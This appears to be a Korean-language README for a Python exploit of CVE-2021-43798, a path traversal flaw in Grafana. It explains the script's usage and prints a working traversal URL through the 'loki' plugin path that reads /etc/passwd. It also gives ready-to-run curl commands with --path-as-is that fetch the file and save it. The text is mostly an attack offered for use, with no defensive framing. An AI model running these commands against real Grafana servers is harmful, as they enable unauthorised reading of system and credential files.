
CVE-2021-43798에 대한 Python 익스플로잇, Grafana의 경로 탐색 취약점으로, 플러그인 URL의 디렉터리 탐색을 통해 임의 파일 읽기를 가능하게 합니다.
사용법: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: 오류: 다음 인수가 필요합니다: -H/--host
예: python3 grafana-exploit.py --host <target_host>
임의 파일 읽기에 성공한 경우 요청 URL과 curl 명령어를 표시합니다
[+]요청 URL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
[+]curl 명령어
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
따라서 파일을 다운로드하려면 위와 같이 실행하세요
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd